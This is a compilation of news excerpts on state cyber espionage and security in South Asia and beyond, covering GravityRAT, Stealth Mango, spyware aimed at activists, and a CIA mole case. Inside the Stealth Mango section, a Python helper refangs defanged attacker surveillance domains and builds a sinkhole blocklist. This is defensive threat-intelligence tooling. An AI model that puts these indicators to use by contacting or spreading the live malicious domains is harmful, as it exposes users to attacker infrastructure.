Moreover, the Ministry of Information and Broadcasting will propose a mechanism that could chalk out a way forward towards the use of social media for a progressive Pakistan.
The meeting ended on a note that a next session would be scheduled soon to conclude the process of evolving a mechanism for ensuring cyber-security.
Ex-CIA officer arrested after US spy network is exposed in China
It was one of the worst intelligence failures for years
Andrew Buncombe, New York (@AndrewBuncombe)
Last spring, The New York Times reported that as many as 20 US intelligence assets had been killed by China since 2010, destroying years worth of intelligence efforts in the country. One operative was allegedly shot and killed in front of his colleagues and his body left in the car park of a government building as a warning to others.
US officials described the losses as “one of the worst” intelligence breaches in decades, comparing it to the number of assets lost in the Soviet Union in the 1980s and 1990s, when two prominent US assets worked as double agents for the Soviets. Officials said the breach has destroyed years of network-building within the country.
The arrest of Mr Lee comes as China is looking to increasingly spread its international influence – economically, diplomatically and militarily. At the same time, the US, under the America First strategy adopted by Donald Trump, appears to be retreating from many areas, such as the environment and international security, that it once led.
A former CIA officer has been arrested and charged as part of an alleged espionage scandal investigators claim resulted in the collapse of the US spying network in China and the deaths or imprisonment of up to 20 agency informants.
Jerry Chun Shing Lee, 53, a naturalised US citizen, was arrested earlier this week after arriving at JFK International Airport in New York. Mr Lee, who currently lives in Hong Kong, appeared in court and was charged with illegally retaining classified records, including names and phone numbers of covert CIA assets.
Mr Lee, who served in the US Army from 1982-86, joined the CIA in 1994 and worked as a case officer trained in covert communications, surveillance detection, and the recruitment and the handling of assets.
“[Mr] Lee began working for the CIA as a case officer in 1994, maintained a Top Secret clearance and signed numerous non-disclosure agreements during his tenure at CIA,” according to a statement released by the US Department of Justice.
The arrest of Mr Lee, who has not offered a plea, is said to have marked the culmination of a counter-espionage operation by the FBI that lasted more than five years. That investigation was established in 2012, two years after the CIA started losing assets in China.
Reports in the US media said investigators were initially unsure whether the agency had been hacked by the Chinese authorities or whether the losses were the result of a mole.
According to an eight-page affidavit, Mr Lee, who left the CIA in 2007 and has been working for a well-known auction house, travelled from Hong Kong to northern Virginia, where he lived from 2012 to 2013 – apparently having been lured there with a fake job offer.
When he flew to Virginia, the FBI obtained a warrant to search Mr Lee’s luggage and hotel room. The court documents say agents found two small books with handwritten notes containing names and numbers of covert CIA employees and locations of covert facilities.
Mr Lee left the US in 2013 after being questioned on five different occasions by FBI agents. He never mentioned his possession of the books containing classified information, say the court documents.
The FBI affidavit makes no allegations of espionage against Mr Lee, only alleging illegal retention of documents. Any conviction on that offence carries a maximum penalty of 10 years in prison.
Malware allegedly designed by Pakistani hackers has become stronger: experts
GravityRAT, a malware allegedly designed by Pakistani hackers, has recently been updated further and equipped with anti-malware evasion capabilities, Maharashtra cybercrime officials said.
The RAT was first detected by the Indian Computer Emergency Response Team, CERT-In, on various computers in 2017. It is designed to infiltrate computers, steal users' data, and relay the stolen data to command-and-control centres in other countries. The 'RAT' in its name stands for Remote Access Trojan, a program that can be controlled remotely and is thus difficult to trace.
Maharashtra cybercrime department officials said that the latest update to the program by its developers is part of GravityRAT’s function as an Advanced Persistent Threat (APT), which, once it infiltrates a system, silently evolves and does long-term damage.
“GravityRAT is unlike most malware, which are designed to inflict short term damage. It lies hidden in the system that it takes over and keeps penetrating deeper. According to latest inputs, GravityRAT has now become self aware and is capable of evading several commonly used malware detection techniques,” an officer of the cybercrime unit said.
One such technique is ‘sandboxing’, to isolate malware from critical programs on infected devices and provide an extra layer of security.
“The problem, however, is that malware needs to be detected before it can be sandboxed, and GravityRAT now has the ability to mask its presence. Typically, malware activity is detected by the ‘noise’ it causes inside the Central Processing Unit, but GravityRAT is able to work silently. It can also gauge the temperature of the CPU and ascertain if the device is carrying out high intensity activity, like a malware search, and act to evade detection,” another officer said.
Officials said that GravityRAT infiltrates a system in the form of an innocuous-looking email attachment, which can be in any format, including MS Word, MS Excel, MS PowerPoint, Adobe Acrobat or even audio and video files.
“The hackers first identify the interests of their targets and then send emails with suitable attachments. Thus a document with ‘share prices’ in the file is sent to those interested in the stock market. Once it is downloaded, it prompts the user to enter a message in a dialogue box, purportedly to prove that the user is not a bot. While the users take this to be a sign of extra security, the action actually initiates the process for the malware to infiltrate the system, triggering several steps that end with GravityRAT sending data to the Command and Control server regularly,” an officer said.
The other concern is that the Command and Control servers are based in several countries. The data is sent in an encrypted format, making it difficult to detect exactly what is leaked.
Human rights defenders in Pakistan face digital threats, attacks: Amnesty
Ramsha Jahangir | Updated May 16, 2018
KARACHI: Human rights defenders in Pakistan are under threat from a targeted campaign of digital attacks, which has seen social media accounts hacked and computers and mobile phones infected with spyware, a four-month investigation by Amnesty International revealed.
In a new report released on Tuesday titled ‘Human Rights Under Surveillance: Digital Threats Against Human Rights Defenders in Pakistan’, the human rights watchdog revealed how attackers were using fake online identities and social media profiles to ensnare Pakistani human rights defenders online and mark them out for surveillance and cybercrime.
“We uncovered an elaborate network of attackers who are using sophisticated and sinister methods to target human rights activists. Attackers use cleverly designed fake profiles to lure activists and then attack their electronic devices with spyware, exposing them to surveillance and fraud and even compromising their physical safety,” said Sherif Elsayed-Ali, Director of Global Issues at Amnesty International.
HR watchdog calls on authorities to carry out investigation to identify perpetrators
The investigation showed how attackers used fake Facebook and Google login pages to trick their victims into revealing their passwords. “It is already extremely dangerous to be a human rights defender in Pakistan and it is alarming to see how attacks on their work are moving online,” he said.
The report highlighted the case of Diep Saeeda, a prominent civil society activist from Lahore. On December 2, 2017, one of her friends, Raza Mehmood Khan, a peace activist who tried to bring people from India and Pakistan together through activities like letter-writing, was subjected to an enforced disappearance.
Ms Saeeda began publicly calling for Mr Raza’s release, including petitioning the Lahore High Court. Soon after, she began to receive suspicious messages from people claiming to be concerned about Mr Raza’s well-being, the report found.
As per Amnesty International’s investigation, a Facebook user who claimed to be an Afghan woman named Sana Halimi — living in Dubai and working for the UN — repeatedly contacted Ms Saeeda via Facebook Messenger, saying that she had information about Mr Raza. The operator of the profile sent her links to files containing malware called StealthAgent which, if opened, would have infected her mobile devices.
The profile — which the human rights watchdog believed was fake — was also used to trick Ms Saeeda into divulging her email address, to which she started receiving emails infected with a Windows spyware commonly known as Crimson.
Amnesty found that several human rights activists in Pakistan have been targeted in this way, sometimes by people claiming to be human rights activists themselves.
Ms Saeeda also received emails claiming to be from staff of the Punjab chief minister. The emails included false details of a supposed upcoming meeting between the provincial ministry of education and her organisation, the Institute for Peace and Secular Studies. In other cases, the attackers pretended to be students looking for guidance and tuition from Ms Saeeda.
Stealth Mango & Tangelo: Selling your fruits to nation state actors
Lookout Security Intelligence has discovered a set of custom Android and iOS surveillanceware tools we’re respectively calling Stealth Mango and Tangelo. These tools have been part of a highly targeted intelligence gathering campaign we believe is operated by members of the Pakistani military. Our investigation indicates this actor has used these surveillanceware tools to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. To date, we have observed Stealth Mango being deployed against victims in Pakistan, Afghanistan, India, Iraq, Iran, and the United Arab Emirates. The surveillanceware also retrieved sensitive data from individuals and groups in the United States, Australia, and the United Kingdom. These individuals and groups were not themselves targeted, but interacted with individuals whose devices had been compromised by Stealth Mango or Tangelo. We believe that the threat actor behind Stealth Mango is also behind Op C Major and Transparent Tribe.
Key findings
• Lookout researchers have identified a new mobile malware family called Stealth Mango.
• Our research shows that Stealth Mango is being actively managed by Pakistan-based actors that are likely military.
• Stealth Mango is being used in targeted surveillance operations against government officials, members of the military, and activists in Pakistan, Afghanistan, India, Iraq, and the United Arab Emirates.
• We determined that government officials and civilians from the United States, Australia, the United Kingdom, and Iran had their data indirectly compromised after they interacted with Stealth Mango victims.
• The actors behind Stealth Mango typically lure victims via phishing, but they may also have physical access to victims' devices.
• The attacker has multi-platform capabilities. We know of the Android component and there is evidence of an iOS component. The evidence is as follows:
  • A sample Debian package on attacker infrastructure called Tangelo
  • EXIF data from exfiltrated content showed data from iPhones
  • WHOIS information from the attackers shows registrations for the following domains: iphonespyingsoftware[.]org, iphonespyingapps[.]org, and iphonespyingapps[.]info
• We have identified over 15 gigabytes of compromised data on attacker infrastructure.
• Exfiltrated content includes call records, audio recordings, device location information, text messages, and photos.
• We found attacker infrastructure running the WSO web shell, which provides a third party with complete control over the server.
• The actor deploying Stealth Mango appears to have a primarily mobile-focused capability.
• Stealth Mango and Tangelo appear to have been created by freelance developers with physical presences in Pakistan, India, and the United States.
• These individuals belong to the same developer group.
• We linked their tooling to several commodity mobile surveillance tools, suggesting that they are either sharing code or have engaged with several distinct customers who are being delivered tooling based off similar source code.
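A small defensive use of findings like these, added here as an example and not Lookout's own code: a Python helper that pulls the defanged domains out of a report, refangs them so they can be matched against DNS or proxy logs, and re-defangs them for safe sharing or a sinkhole list. The sample text is constructed around the three domains quoted in the findings above; the `[.]` and `(.)` defanging styles it recognises are the common report conventions, an assumption rather than anything the report specifies.

```python
import re
from typing import List

# Constructed excerpt modelled on the findings above (not the report's own text);
# the three defanged domains are the ones quoted in the key findings.
SAMPLE_REPORT = """
WHOIS information from the attackers shows registrations for the following domains:
iphonespyingsoftware[.]org, iphonespyingapps[.]org, and iphonespyingapps[.]info.
A sample Debian package on attacker infrastructure called Tangelo was also found.
"""

# Matches a domain whose labels are joined by a defanged separator ("[.]" or "(.)").
# Plain dotted domains are deliberately ignored so prose like "found. A sample"
# or an undefanged mention never becomes an indicator by accident.
DEFANGED_DOMAIN = re.compile(
    r"\b((?:[a-z0-9-]+(?:\[\.\]|\(\.\)))+[a-z]{2,})\b",
    re.IGNORECASE,
)


def refang(indicator: str) -> str:
    """Turn a defanged domain back into its routable, lower-cased form."""
    return re.sub(r"\[\.\]|\(\.\)", ".", indicator).lower()


def defang(domain: str) -> str:
    """Defang a domain so it is not clickable or auto-linked when shared."""
    return domain.replace(".", "[.]")


def extract_domains(text: str) -> List[str]:
    """Return the unique, refanged domains found in a report, sorted for stable diffs."""
    found = {refang(m.group(1)) for m in DEFANGED_DOMAIN.finditer(text)}
    return sorted(found)


def sinkhole_lines(domains: List[str], sink: str = "0.0.0.0") -> List[str]:
    """Render a hosts-file style blocklist pointing each indicator at a sinkhole address."""
    return [f"{sink} {d}" for d in domains]


if __name__ == "__main__":
    domains = extract_domains(SAMPLE_REPORT)
    print("refanged for log matching:", domains)
    print("defanged for sharing:", [defang(d) for d in domains])
    print("\n".join(sinkhole_lines(domains)))
```

The extractor only accepts indicators that were defanged in the source, which is the usual signal that an author meant them as IoCs; anything else in the report text is left alone.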
Pakistan’s first-ever Cyber Security Centre launched
Aims to develop tools and technologies to protect cyberspace, sensitive data and local economy from the cyber-attacks
Pakistan government’s Cyber Security Centre has been inaugurated at Air University in Islamabad to deal with cyber security challenges in the digital age.
Faaiz Amir said that Air University is also commencing a four-year BS cyber security programme, designed to develop modern cyber security skills and apply them to protecting computers, systems and networks from cyber-attacks. The programme would increase awareness and knowledge of cyber security among Pakistani students, he added.
Cyber security encompasses technologies, processes and controls that are designed to protect systems, networks and data from cyber attacks. Pakistan’s Cyber Security Centre aims to develop advanced tools and research technologies to protect Pakistan’s cyberspace, sensitive data, and local economy from the cyber-attacks.
The headquarters of the National Centre for Cyber Security will be based at Air University Islamabad, with labs at different universities of Pakistan including Bahria University Islamabad, National University of Science and Technology (NUST), Information Technology University Lahore (ITU), Lahore University of Management Sciences (LUMS), University of Peshawar, University of Engineering and Technology Peshawar, University of Nowshera, Pakistan Institute of Engineering and Applied Sciences (PIEAS), NED University Karachi, University of Engineering and Technology Lahore and University of Engineering and Technology Taxila.
Cyber-attacks pose an enormous threat to the national economy, defence and security, National Security Adviser Nasser Khan Janjua said earlier.
After repeated calls from experts to secure the cyberspace, the Pakistan government has finally launched the centre to protect the cyberspace, sensitive data, and local economy from cyber-attacks.
Last week, the country's National Counter Terrorism Authority (NACTA) also established a cyber security wing on modern lines to evolve cyber security strategies and to meet emerging cyber terrorism threats.
Journalist Warns Cyber Attacks Present A 'Perfect Weapon' Against Global Order
DAVIES: And tell us about this private cyber investigator Kevin Mandia. There was this building in China where a lot of this activity was going on - and the level of information he was able to get.
SANGER: So the building is near the Shanghai airport. And it's a big, bland, white office tower. And it is the home of Unit 61398, which is a PLA cyber unit.
DAVIES: People's Liberation Army - the Chinese Army.
SANGER: The People's Liberation Army Cyber Unit. And the way that people began to understand what was happening was - Mr. Mandia, who ran a company called Mandiant that's since been merged up with FireEye, which he now runs, began to track the attacks that this unit was doing to steal intellectual property in the United States whether it was, you know, F-35 designs or other industrial designs and then turn them over to state-run Chinese firms. The hackers who would come in would sit at their computer terminals, and, unbeknownst to them, Mandiant would turn the cameras on those computers back on. So you could see them working.
And they would come in at like 8:30 in the morning. They would check sports scores. They would send a few notes to their girlfriends. A couple of them would look at a little bit of porn. You know, they would be reading newspaper articles. 9 o'clock would come. They'd start hacking into American sites. Lunchtime, they're back to sending notes to the girlfriends. They're back to checking their sports scores. I mean, it was such an interesting picture of the life of a young Chinese hacker.
DAVIES: David Sanger is a national security correspondent for The New York Times. His book about cyberwarfare is called "The Perfect Weapon." After a break, he'll take us inside the Russian hack of the Democratic National Committee, and we'll talk about President Trump's initiative to curb North Korea's nuclear program. Also, rock critic Ken Tucker reviews Father John Misty's new album. I'm Dave Davies. And this is FRESH AIR.
DAVIES: Right. I mean, obviously, to conduct the kind of disabling cyberattack that would shut down a lot of a country's infrastructure, you have to have done a lot of work beforehand. I want to be clear about this. Are we saying that we know that there are implants in our power grid which would enable the Russians or someone else to take it down?
SANGER: We know that there are implants in our power grid. Interesting question is, if somebody made use of it, how good would it be at taking it down? And that's why for the electric utility industry and for the financial industry, they've invested a huge amount in redundancy and resilience so that if you lose some set of power plants, you could contain it, route around it and be able to pick up and go on. And you just don't know until things happen how well your adversary has wired your system to take everything down. And as you said, this takes a lot of time. The United States spent years getting inside the Iranian centrifuges at Natanz and even then had to keep working on the software to improve it. The North Koreans, when they went into Sony Pictures in 2014 in retaliation for the release of a really terrible movie called "The Interview" that envisioned the assassination of Kim Jong Un, the same friendly Kim Jong Un we all saw in Singapore the other day - when the North Koreans went in, they went in in early September of 2014. They didn't strike until around Thanksgiving because it took all that time just to map out the interconnections of the electrical system, of the computer system, and when they did strike, it was devastating. They took out 70 percent of Sony's computer servers and hard drives.
DAVIES: OK. In this book, you say that, you know, cyberwarfare is the kind of game-changing innovation that's - you compare it to the introduction of aircraft into warfare in the early 20th century and that we are still figuring out what rules or conventions should apply to it. I want to get to some of that conversation, but let's talk a bit about some of the experience that we've had over the last 10 years. You write that in 2008, a woman at the National Security Agency, Debora Plunkett, discovers something about the classified networks in the Pentagon that's troubling. What did she find?
SANGER: Well, she was overseeing security at the NSA, and somebody came to her with evidence that the Russians - though the U.S. did not announce it was Russians at the time - were deep into something called the SIPRNet, which is basically a classified network by which the Defense Department, some of the intelligence agencies, sometimes the State Department, communicate with each other. And this was a big shock to everybody because they had seen the Russians in unclassified systems before, but here they were deep into a classified system. And the first question was, how'd they get in? And the answer was so simple that it really was a wakeup call. Somebody had distributed little USB keys, you know, the kinds you get at conventions and all those kinds of...
How #Israel's #Mossad broke into an #Iranian facility and stole half a ton of #nuclear files. Mossad agents broke into a warehouse in an industrial area in #Tehran, had 6 and 1/2 hours to finish the job before the morning shift arrived at 7 A.M. #Iran
An operation by the Mossad earlier this year to steal files relating to Iran's nuclear program was conducted on January 31, according to a report by the New York Times. Mossad operatives broke into a warehouse in an industrial area in Tehran and, according to the report, had six hours and 29 minutes to finish the job before the morning shift arrived at 7 A.M. During this limited time, they disabled the alarms, broke through two doors, burned open dozens of safes and fled the city with the documents.
The agents were carrying blowtorches that burned at some 2,000 degrees Celsius to cut through the safes, according to the Times. The report suggests that Israel may have had help on the inside, since it says that the Mossad agents knew exactly which safes to break into – leaving many of the others untouched. At the end of the night, the agents fled with half a ton of secret materials, including 50,000 pages and 163 compact discs containing files, videos and plans.
The Iranians began storing the files at the warehouse after signing a landmark 2015 accord on its nuclear program with the United States, European powers, Russia and China. The deal gave the UN nuclear watchdog access to suspected nuclear sites in Iran.
Israel claims that after signing the agreement, the Iranian regime collected files from across the country about the nuclear program, storing them at the warehouse. The warehouse wasn't guarded around the clock so as to not arouse suspicion.
The report was based on briefings Israel gave Western media outlets last week and included details from the stolen documents, which were presented in April by Prime Minister Benjamin Netanyahu in a prime time address.
The report further stated that Israeli officials said Tehran received help for its nuclear program from Pakistan and from other foreign experts.
Another report, from the Washington Post, says that Iran was on the verge of acquiring "key bombmaking technologies" when the program, code-named Project Amad, was halted some 15 years ago.
Could Offensive #Cyber Capabilities Tip #India and #Pakistan to War? India launched Operation Hangover targeting Pakistan, and Pakistan responded with Operation Arachnophobia, seeking to obtain intelligence from Indian officials @Diplomat_APAC http://thediplomat.com/2019/03/could-offensive-cyber-capabilities-tip-india-and-pakistan-to-war/
While both countries are responding to the rise in cyberattacks with national strategies and increased defensive capabilities, we do not know how they will set the rules when it comes to offensive cyber operations. We do know that both countries are investing in cybersecurity to defend against cyberattacks.
India has been establishing national cybersecurity policies to address the rise in persistent cyberattacks. The country is vulnerable to cyberattacks—it was ranked as the second most vulnerable nation-state targeted by cyberattacks in a survey by security company Symantec. As India’s economy has shifted toward information and communications technology (ICT), which includes information technology services, commerce, and banking sectors, there are concerns of cyberespionage and cyberattacks taking place against Indian industries and businesses.
In fact, according to a study commissioned by the High Court of India, cyber-related crimes cost Indian businesses $4 billion in 2013. This has led the government and private sector to increase their efforts to protect these industries. Back in 2013, India unveiled its National Cyber Security Policy, which outlined the measures the government would take to protect India's critical infrastructure. However, many critics point out that this national policy has done little to curb cyberattacks, as many of its provisions lack any mechanism for implementation.
Pakistan is also on alert, though it does not have a national cybersecurity strategy document, despite efforts in Islamabad to develop a framework that will protect critical institutions from cyberattacks. These efforts have been motivated in part by the Edward Snowden leaks, which detailed the U.S. National Security Agency’s spying on Pakistan and were an inflection point for Pakistani government officials, as they realized they needed to address the gaps in their information security. A national Cyber Security Strategy was presented to the National Assembly, but no headway has been made yet on implementing the proposed actions, which included the creation of a national CERT and an Inter-Services Cyber Command Center that would streamline cyber defense for Pakistan’s Army. Pakistan still does not have an official national cybersecurity strategy.
Both countries’ security postures are slowly transforming to incorporate cybersecurity. However, there is still not enough data available on what types of technologies these countries possess and how integrated these technologies are in India’s and Pakistan’s national security strategies. There are reports that both countries have engaged in offensive cyber operations. Each country has its own cyberespionage division, which siphons critical information from other nation-states’ security and intelligence organizations.
India launched Operation Hangover, which has targeted Pakistan, and in response Pakistan spearheaded Operation Arachnophobia, which sought to obtain intelligence from Indian officials. While these operations are well known, there is still a lack of awareness of how much each country spends on cyber technologies and the types of technologies they are employing. India is one of the world's largest military spenders, yet its cybersecurity budget is “inadequate” for the growing cyber threat.
Understanding cyber capabilities is important because they can change geopolitical calculations. For example, the low cost of entry for offensive cyber capabilities benefits less resourced actors, and “offense preference” in cyberspace makes it easier to succeed on offense than at defense.
#India says a #Pakistani spy used bots to lure 98 #Indian targets in Army, Navy and Air Force, including #BrahMos #Missile Project Engineer, on #Facebook using 'Whisper', 'Gravity Rat' malware.
http://toi.in/xozvDa41/a24gk via @timesofindia
A recent investigation revealed how a Pakistani spy on Facebook named Sejal Kapoor hacked into the computers of 98 Indian defence officials since 2015. She was also involved in the leak of classified files of BrahMos missile in 2018.
It has been revealed that the hacker targeted officials from Indian Army, Navy, Air Force, paramilitary forces and state police personnel in Rajasthan, Madhya Pradesh, Uttar Pradesh, and Punjab between 2015 and 2018, reported TOI.
The hacker deceived her targets by sharing pictures and videos laced with a piece of malware called "Whisper", which is reported to connect to a third-party server in a West Asian country.
Sejal's involvement in last year's leakage of sensitive technical information to Pakistan was also established in the recent investigation.
In 2018, an engineer working at the BrahMos Aerospace Private Limited, Nishant Agarwal, was arrested for providing technical information on BrahMos missiles to Pakistan in a joint operation by the Uttar Pradesh and Maharashtra Anti-Terrorism Squad (ATS) as well as the Military Intelligence (MI).
It was then revealed, based on evidence found on his personal computer and Facebook chat records, that Agarwal had passed sensitive information to Pakistan's spy agency, the Inter-Services Intelligence (ISI).
Apart from the "Whisper" application, the spy also used a tool called "Gravity Rat." Indian intelligence agencies say that both tools use "self-aware" detection techniques as well as a VPN hiding mechanism that lets the hacker rotate through around 25 internet addresses. The malware is described as complex and not easily identified by anti-malware software.
The five dozen chats recently uncovered by intelligence agency revealed that Sejal would "force install" the Whisper app on computers of the targeted officials, reported TOI.
"Instantly, after getting downloaded, the malware first prompts the user to key in a code. It's to ensure that the app is not a virus or malware. Immediately after that, it scans all latest attachments sent from the computer in emails or downloads. It then scans all files with photographs, databases of MS Word and MS Excel, by first verifying their encryption keys and then opening their passwords," said a senior intelligence officer, reported TOI.
According to Sejal's Facebook profile, the hacker is an employee of a company called "Growth Company" in Manchester, UK. Experts have said that such cases of armed forces officials being "honey-trapped" into sharing classified information are a threat to India's national security.
Last year, a Border Security Force (BSF) soldier was arrested by the Uttar Pradesh ATS on September 18 for sharing key information about his unit's operations with a female Pakistani ISI agent who claimed to be a defence reporter.
Mysterious Explosion and Fire Damage #Iranian Nuclear Enrichment Facility Building New Advanced Centrifuges. A decade ago, the #UnitedStates and #Israel used #Stuxnet worm in operation code-named “Olympic Games" which destroyed 1,000 #Iranian centrifuges.
A fire ripped through a building at Iran’s main nuclear-fuel production site early Thursday, causing extensive damage to what appeared to be a factory where the country has boasted of producing a new generation of centrifuges. The United States has repeatedly warned that such machinery could speed Tehran’s path to building nuclear weapons.
The Atomic Energy Organization of Iran acknowledged an “incident” at the desert site, but did not term it sabotage. It released a photograph showing what seemed to be destruction from a major explosion that ripped doors from their hinges and caused the roof to collapse. Parts of the building, which was recently inaugurated, were blackened by fire.
But it was not clear how much damage was done underground, where video released by the Iranian government last year suggested most of the assembly work is conducted on next-generation centrifuges — the machines that purify uranium.
The fire took place inside the nuclear complex at Natanz, where the Iranian desert gives way to barbed wire, antiaircraft guns and an industrial maze. The damaged building is adjacent to the underground fuel production facilities where, a decade ago, the United States and Israel conducted the most sophisticated cyberattack in modern history, code-named “Olympic Games.” That attack, which lasted for several years, altered the computer code of Iran’s industrial equipment and destroyed roughly 1,000 centrifuges, setting back Iran’s nuclear program for a year or more.
The early evidence strongly suggested on Thursday the damage was in fact sabotage, though the possibility remained that it was the result of an industrial accident.
The timing was suspicious: A series of unexplained fires have broken out in recent days at other facilities related to the nuclear program. Still, experts noted that if the explosion was deliberately set, it showed none of the stealth and secrecy surrounding the complex cyberattacks by the United States and Israel that were first ordered by President George W. Bush toward the end of his term, and then extended by President Barack Obama.
The Persian language service of the BBC reported that several members of its staff received an email from a previously unknown group, which referred to itself as the Homeland Cheetahs, before news of the fire became public. The group claimed responsibility and said it was composed of dissidents in Iran’s military and security apparatus. They said the attack would target above-ground sections of the targeted facilities so that the Iranian government could not cover up the damage.
There was no way to confirm if Homeland Cheetahs was a real group, and if so whether it was domestic, as it claimed, or supported by a foreign power.
A Middle Eastern intelligence official, who would not be quoted by name because he was discussing closely held information, said the blast was caused by an explosive device planted inside the facility. The explosion, he said, destroyed much of the aboveground parts of the facility where new centrifuges — delicate devices that spin at supersonic speeds — are balanced before they are put into operation.
Pakistan has established #Cyber Forensic Laboratory at NUST, and the #Computer Emergency Response Team (PAK-CERT). #Pakistan has made major progress in #Nuclear ‘Security and Control Measures’ category with an incredible (+25) points. https://moderndiplomacy.eu/2020/08/18/nti-2020-and-pakistans-cyber-preparedness/
Among countries with weapons-usable nuclear materials, Australia has for the third time been ranked first in the sabotage ranking and for the fifth time for its security practices. Likewise, New Zealand and Sweden stand first in the ranking for countries without materials. It is pertinent to highlight that Pakistan’s commitment to nuclear safety and security has also been duly acknowledged: because Pakistan has adopted new on-site physical protection and cyber security regulations, it has been credited for them in the index, which would likely further improve its existing insider threat prevention measures. The 2020 NTI report ranks Pakistan among the countries that hold nuclear materials, and its adherence to nuclear safety and security has been vindicated.
It is worth mentioning that in the theft ranking for countries with nuclear materials, Pakistan has improved its overall score by 7 points. It has made major progress in the ‘Security and Control Measures’ category, with an incredible +25 points based on the new regulations, and has also improved in the Global Norms category by 1 point. The strengthened laws and regulations have provided sustainable security benefits and lifted Pakistan’s overall score. The improvement in Security and Control Measures has been steady over time: +8 points in 2014, +2 points in 2016 and +6 points in 2018. Since 2014 the gains have come from new regulations for on-site physical protection, and since 2018 from improved insider threat protection. Since the report was first launched in 2012, Pakistan, unlike other states, has improved its score in the Security and Control Measures category by 25 points, the second-largest improvement among the states assessed.
At the national level, Pakistan has taken various initiatives including; the establishment of Cyber Forensic Laboratory at the National University of Science and Technology (NUST), and the Computer Emergency Response Team (PAK-CERT) to deal with cyber-related threats. Furthermore, the National Centre for Cyber Security at the Air University also aims at making cyberspace of Pakistan more secure. It has affiliated Research and Development Laboratories working on projects related to network security systems and smart devices. To maintain such a status, in the longer term, Pakistan needs to further expand the scope of its existing national cyber policy framework. This would enhance Pakistan’s capabilities to tackle cyber threats to nuclear security in a more efficient way.
Hence, the emergence of cyber threats to nuclear security at both the regional and the global level needs to be addressed with greater cooperation among states. Likewise, it is also essential to address the human factor in cyber security, since insiders can unwittingly introduce or exacerbate cyber vulnerabilities. Pakistan needs to further enhance the role and increase the capacity of its specialized cyber workforce. In this regard, if required, the number of highly skilled technical staff may be increased, keeping in view the emerging cyber threats to nuclear facilities.
| Rank 2019 | Rank 2020 | Country | Score 2019 | Score 2020 | % of Mobiles Infected with Malware | Financial Malware Attacks (% of Users) | % of Computers Infected with Malware | % of Telnet Attacks by Originating Country (IoT) | % of Attacks by Cryptominers | Best Prepared for Cyberattacks | Most Up-to-Date Legislation |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 | 1 | Algeria | 55.75 | 48.99 | 26.47 | 0.5 | 19.75 | 0.07 | 1.27 | 0.262 | 1 |
| - | 1 | Tajikistan | - | 48.54 | 2.62 | 1.4 | 8.12 | 0.01 | 7.90 | 0.263 | 2 |
| - | 3 | Turkmenistan | - | 48.39 | 4.89 | 1.1 | 5.84 | 0 | 7.79 | 0.115 | 2 |
| - | 4 | Syria | - | 44.51 | 10.15 | 1.2 | 13.99 | 0.01 | 1.36 | 0.237 | 1 |
| 9 | 5 | Iran | 43.29 | 43.48 | 52.68 | 0.8 | 7.21 | 3.31 | 1.43 | 0.641 | 2 |
| 8 | 6 | Belarus | 45.09 | 41.64 | 2.10 | 2.9 | 13.34 | 0.05 | 2.35 | 0.578 | 3 |
| 6 | 7 | Bangladesh | 47.21 | 40.36 | 30.94 | 0.8 | 16.46 | 0.38 | 1.91 | 0.525 | 3.5 |
| 7 | 8 | Pakistan | 47.10 | 40.33 | 28.13 | 0.8 | 9.96 | 0.37 | 2.41 | 0.407 | 2.5 |
| 5 | 9 | Uzbekistan | 50.50 | 39.41 | 4.14 | 2.1 | 10.5 | 0.02 | 4.99 | 0.666 | 3 |
According to our study, Algeria is still the least cyber-secure country in the world despite its score improving slightly. With no new legislation (the same was true of all countries), it is still the country with the poorest legislation: only one piece of legislation, concerning privacy, is in place. It also scored poorly for computer malware infection rates (19.75%) and for its preparation for cyberattacks (0.262). Nevertheless, only its preparation score worsened over the last year (its legislation score could not get any worse). In all the other categories, attacks declined, as was the common trend for most countries.
Other high-ranking countries were Tajikistan, Turkmenistan, Syria, and Iran, which took over from last year’s Indonesia, Vietnam, Tanzania, and Uzbekistan.
The highest-scoring countries per category were:
Highest percentage of mobile malware infections – Iran – 52.68% of users
Highest number of financial malware attacks – Belarus – 2.9% of users
Highest percent of computer malware infections – Tunisia – 23.26% of users
Highest percentage of telnet attacks (by originating country) – China – 13.78%
Highest percentage of attacks by cryptominers – Tajikistan – 7.9% of users
Least prepared for cyber attacks – Turkmenistan – 0.115
Worst up-to-date legislation for cybersecurity – Algeria – 1 key category covered
Apart from Algeria, China was the only country that stayed at the top of one of these lists – all of the other countries are new since last year.
Experts are unanimous in saying that the most important target of #Indian #cyber-#espionage & #cyberattacks by far is #Pakistan. Limited employment prospects of Indian techies have created a swarm of underground threat actors in #India| The Daily Swig
ANALYSIS India is sometimes overlooked in the threat intelligence community, even though the South Asian nation has advanced cyber capabilities – not least a huge pool of talent.
The country boasts a large number of engineers, programmers, and information security specialists, but not all of this tech talent was put to good use, even before the Covid-19 pandemic cast a shadow over the global economy.
Their somewhat limited employment prospects are said to have created a swarm of underground Indian threat actors eager to show off their hacking talents and make money – a resource that the Indian government might be able to tap into in order to bolster its own burgeoning cyber-espionage resources.
India is in catch-up mode for now, but has the technical resources to make rapid progress.
Who is being targeted by Indian hacking groups?
Geopolitical factors have fueled an increase in cyber threat activity both originating from and targeting India.
Experts quizzed by The Daily Swig were unanimous in saying that the most important target of Indian cyber-espionage by far is Pakistan – a reflection of the decades-long struggle over the disputed region of Kashmir.
China, India’s neighbour and an ally of Pakistan, is also a top target of state-sponsored Indian cyber-espionage.
Paul Prudhomme, head of threat intelligence advisory at IntSights, told The Daily Swig: “Indian cyber-espionage differs from that of other top state-sponsored threats, such as those of Russia and China, in the less ambitious geographic scope of their attacks.”
Other common targets of Indian hacking activity include other nations of the South Asian subcontinent, such as Bangladesh, Sri Lanka, and Nepal. Indian espionage groups may sometimes expand their horizons further to occasional targets in Southeast Asia or the Middle East.
Indian cyber-espionage groups typically seek information on Pakistan’s government, military, and other organizations to inform and improve its own national security posture.
But this is far from the only game in town.
For example, one Indian threat group called ‘Dark Basin’ has allegedly targeted advocacy groups, senior politicians, government officials, CEOs, journalists, and human rights activists across six continents over the last seven years.
India is currently considered to have a less mature cyber warfare armoury and capability than the ‘Big Six’ – China, North Korea, Russia, Israel, the UK, and US – but this may change over time since its capability is growing.
Chris Sedgwick, director of security operations at Talion, the managed security service spinoff of what used to be BAE Systems’ intelligence division, commented:
The sophistication of the various Indian cyber threat actors does not appear to be in the same league as China or Russia, and rather than having the ability to call on a cache of 0-day exploits to utilise, they have been known to use less sophisticated – but still fairly effective – techniques such as decoy documents containing weaponised macros.
